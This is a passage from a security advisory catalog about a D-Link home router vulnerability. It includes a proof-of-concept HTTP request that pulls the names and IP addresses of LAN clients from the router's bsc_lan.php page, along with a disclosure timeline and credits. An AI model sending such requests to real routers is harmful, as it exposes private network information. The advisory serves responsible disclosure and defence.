ISE SOHO Vulnerability Catalog Published - Independent Security ...
♦ Additional information for vendors regarding immediate and long term fixes for these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors
Solution
- There currently is not a solution to this problem.
- Restrict access to WAN services such as remote management.
Proof of Concept Exploit
HTTP Request
GET /bsc_lan.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.0.1/bsc_wlan_main.php
Cookie: uid=JbaHbdg7nO
Connection: keep-alive
Cache-Control: max-age=0
Partial HTTP Response
Computer Name
bt (192.168.0.100)
lappy (192.168.0.101)
Disclosure Timeline
♦ 3/2013 - Notified D-Link. No response.
♦ 4/3/2013 - Notified D-Link requesting a follow up.
♦ 7/26/2013 - Public Disclosure
References
♦ Advisory/Video: http://infosec42.blogspot.com
♦ http://securityevaluators.com/content/case-studies/
Credit
♦ Discovered By: Kedy Liu – Security Analyst @ Independent Security Evaluators
♦ Exploited By: Kedy Liu – Security Analyst @ Independent Security Evaluators
Vulnerability: Symlink Traversal
CVE: CVE-2013-4855